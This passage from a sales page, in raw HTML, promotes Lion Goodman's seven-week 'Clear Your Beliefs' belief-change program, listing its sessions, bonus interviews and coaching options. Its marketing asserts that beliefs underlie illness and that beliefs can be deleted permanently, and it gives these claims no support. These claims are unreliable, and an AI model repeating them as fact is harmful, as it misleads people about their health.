anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.\n<strong>That Belief Isn''t True.</strong>  Many methods help you recognize that an old belief isn''t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.\n<strong>Tap Your Problem Away. </strong> Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.\n\n<p>Most belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn''t you! The problem is with the method – it was only partially effective!</strong></p>\n\n<p>&nbsp;</p>\n<h1>Here''s Some Good News</h1>\n\n<strong><strong><strong>First: It''s not your fault. There''s nothing wrong with you.</strong></strong></strong>\n<strong>Second: You can change your beliefs <em>permanently</em>.</strong>\n\n<p>To get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they''ll pop up later and create the same problem – again and again.</p>\n\n<p>You can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.</p>\n\n<h1>Imagine The Life You Desire</h1>\n\n<p><strong>Can you imagine this?</strong></p>\n<p><img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" /></p>\n<p>You''re no longer held back by old beliefs and stories.</p>\n<p>There''s no resistance to doing what needs to be done.</p>\n<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\n<p>&nbsp;</p>\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n\n<p><strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong></p>\n\n<p><img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em></p>\n\n<p>Those discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.</p>\n\n<p><em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong></p>\n<p>&nbsp;</p>\n<h1>Clear Whatever Is In The Way</h1>\n\n<p><img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don''t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.</p>\n\n<p><strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don''t</em> want.</strong></p>\n\n<p>&nbsp;</p>\n<h1>Is This A Guaranteed Cure-All?</h1>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.</p>\n\n<p>No technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.</p>\n\n<p>During the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.</p>\n\n<p>&nbsp;</p>\n<h1>The Clear Your Beliefs program can:</h1>\n\nEliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.\nRemove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.\nGive you the power to change your experiences – and your circumstances – at will.\nShow you how to gain mastery over your moods, perceptions, and responses.\n\n<p>&nbsp;</p>\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.</p>\n\n<p>If you''re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em></p>\n\n<p>During each class, you''ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You''ll upgrade your health, your work, and your relationships. You''ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.</p>\n\n<p>If you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.</p>\n\n<h1>With This Methodology, You Can Finally:</h1>\n\n<p>\nManifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a>\nRemove resistance and barriers\nOpen doors to new opportunities\nEliminate pain and suffering from the past\nExperience more fulfillment in your relationships\nAttract more abundance and prosperity\nIncrease your energy, vitality, and productivity\n\n<p><strong>You''ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).</p>\n\n<p>&nbsp;</p>\n\n<h1>A Message from Lion Goodman...</h1>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>\n<p>Dear Explorer:</p>\n<p>As a child, I believed there was something wrong with me. I didn''t look or feel like the other kids. I didn''t like who I was. I felt separate and alone. I didn''t know how to make it better.</p>\n<p>I was gripped by some of life''s biggest questions: "Who am I? Why am I here? What makes me different? What is life about?"</p>\n<p>I began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the "normal" part never happened!)</p>\n<p>After decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.</p>\n<p>I noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it''s possibilities, new opportunities came my way.</p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px;margin-bottom: 5px" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.</p>\n<p>The belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a "download" – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.</p>\n<p>When your closet is crammed full of old outfits you''ll never wear, it''s time for some Spring cleaning!</p>\n<p><em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong></p>\n<p>Having worked with thousands of clients over the past decade, I''ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I''ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven''t touched.</p>\n<p>I am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.</p>\n<p>If you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.</p>\n<p>A lot of people say, "just change your beliefs..." as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.</p>\n<p>In the <em>Clear Your Beliefs</em> course, you''ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.</p>\n<p>This is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.</p>\n<p>Live the life of your dreams. There''s nothing to stop you – except a few old beliefs...</p>\n<p>In gratitude, and with warm wishes for your total success,</p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a></p>\n<p>Lion Goodman, Creator of <em>The BeliefCloset Process</em></p>\n\n<p>&nbsp;</p>\n<h1>Register Today and Discover What''s Possible</h1>\n\n<p>We are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You''ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.</p>\n\n<p>&nbsp;</p>\n\n<h5>Session 1:   <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.</p>\n<p>In this first session, you''ll examine your old beliefs, and determine which ones no longer serve you.  It''s time to discard them and clear some space!  You''ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You''ll feel more open, empowered and free to choose your beliefs and the way you live your life.</p>\n\n<p><strong> In Session 1, you will:</strong></p>\n\nDiscover old limiting beliefs that are deeply buried in your subconscious mind\nLearn which ones keep you stuck, preventing you from having what you want in life\nExperience a process that returns you to your True Self, the home of inner joy and bliss\nBegin to work with, not against, your subconscious mind – where your beliefs reside\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 2:   <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you''ll focus on issues and problems that have kept you from being happy and joyful.</p>\n<p>What do you believe about yourself? Your idea of "Who I am" is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It''s time to haul them out, and toss them out! You don''t need them anymore.  If you hear critical inner voices berating you, don''t miss this session.  Rid yourself of those pesky critical voices along with the diapers!</p>\n\n<p><strong> In Session 2, you will:</strong></p>\n\nUse the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself\nClear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again\nSee your own magnificence through a new clear lens of your own beauty and joy\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 3:  <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.</p>\n<p>This isn''t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.</p>\n<p><em>What are you capable of?  </em>If your answer is "Anything..." you don''t need this session.  But most of us think too small...</p>\n\n<p>Our <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>"What''s the use?  You''ll fail anyway. You don''t deserve happiness – look at you!"  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.</p>\n\nDo you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you''ll eliminate those beliefs and relieve yourself of those symptoms. You''re already a master manifestor – you''re just manifesting your old programs!\n\n<p><strong> In Session 3, you will:</strong></p>\n\nIdentify old beliefs that stand between you and creating the life you want\nDissolve the old beliefs that get in your way over and over, or make you quit when you''re partway there.\nImagine what it means to live without self-imposed limitations, trusting that you can create anything you want\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 4:   <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you''ll delete beliefs that interfere with your personal relationships.</p>\n<p>If you''re married, are you happy and secure?   Or are you anxious about the future?   If you''re not in a relationship, what''s holding you back from finding your ideal mate?</p>\n<p>Humans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned "what love is" from your parents – so it''s no wonder that you''re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad''s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.</p>\n\n<p>&nbsp;</p>\n\n<p><strong> In Session 4, you will:</strong></p>\n\nLook deeply into the childhood patterns that enabled you to survive and thrive\nSee which of your beliefs now interfere with your intimate relationships\nDiscover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 5:   <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you''ll focus on money, wealth and abundance – or the lack thereof!</p>\n<p>What do you believe about earning a living in today''s economy?   Is money really the root of all evil?</p>\n<p>If you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?</p>\n\n<p><strong> In Session 5, you will:</strong></p>\n\nExamine your family and cultural beliefs about money, work, poverty and "deservingness."\nRemove beliefs that create stumbling blocks in the way of natural abundance\nCreate new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve\nLearn why affirmations alone, and the "Law of Attraction," don''t work, regardless of how diligently you practice them\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 6:   <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you''ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.</p>\n<p>Ill health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?</p>\n\n<p><strong> In Session 6, you will:</strong></p>\n\nIdentify old beliefs that stand between you and vibrant health\nRecognize beliefs that make you vulnerable to disease and injury\nDissolve old beliefs at the root of illness, bad habits and lifestyle stress\nImagine the healthy, vibrant body you want, and create it consciously with new beliefs\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 7:   <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you''ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.</p>\n<p>You''ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.</p>\n<p>When you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you''ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.</p>\n\n<p><strong> In Session 7, you will:</strong></p>\n\nScan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live\nLearn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life\nFind your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are\n\n<p></p>\n<p>&nbsp;</p>\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\n<p>In addition to these seven transformational sessions, you''ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.</p>\n<p>&nbsp;</p>\n\nBonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can''t seem to stop hurting each other. What''s going on?</p>\n<p>Lion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)</p>\n<p>Carista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We''re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.</p>\n<p>Learn how to determine your own (and your partner''s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI''s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #2 <strong>- The LoveStyle Profile Quiz </strong>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you''ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong>\n\n<p><img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You''ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world''s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.</p>\n\n<p>Lion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You''ll receive the first two chapters of the book as Bonus #4, below.</p>\n\n<p>Anodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong>\n\n<p><strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:</p>\n\nBe called to awaken your already-powerful ability to create the life of your dreams\nLearn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)\nUnderstand the 7 chakras as stepping stones along the path of the manifestation process\nGain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life\nLearn a process that can strengthen your power of intention\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #5:<strong> Change Your Beliefs eBook</strong>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a></p>\n\n<p>You''ll also receive a copy of Lion''s multimedia eBook, "<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>" </p>\n<p>Lion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it''s so difficult to change your habitual patterns of thought and behavior. </p>\n<p>It''s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #6: <strong>Complete Transcripts of the Course</strong>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!</p>\n\n<p>&nbsp;</p>\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.</p>\n<p><em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.</p>\n<p>Your coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.</p>\n<p><strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they''ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong></p>\n<h1 id="package"></h1>\n<p style="text-align: right"><a href="http://clearyourbeliefs.com/program/#top">Up To Top</a></p>\n<p>&nbsp;</p>\n\n<h1>Purchase Today and You''ll Receive:</h1>\n<p><strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world''s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.</p>\n<h3 style="font-size: 20px">Plus: <em>The Entire BONUS Collection:</em></h3>\n<p>	<strong>=&gt; <em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.\n<strong>=&gt; <em>The Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.\n<strong>=&gt; <em>Your Childhood Bonding Pattern Assessment:</em></strong> The LoveStyle Profile Quiz\n<strong>=&gt; <em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)\n<strong>=&gt; <em>Clear Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> Multimedia eBook by Lion Goodman (PDF)\n<strong>=&gt; <em>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.\n<strong>=&gt; <em>Professional Coaching Sessions:</strong> </em> Optional.</p>\n\n<p>&nbsp;</p>\n\n<p>&nbsp;</p>\n<p><a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank">Register Now</a></p>\n<p style="text-align: center">OR</p>\n<p><a href="http://clearyourbeliefs.com/free-ebook" target="_blank">Free eBook</a></p>\n\n<p>&nbsp;</p>\n\n<h1>Satisfaction Guaranteed</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)</p>\n<p>&nbsp;</p>\n<h1>About Lion Goodman</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft 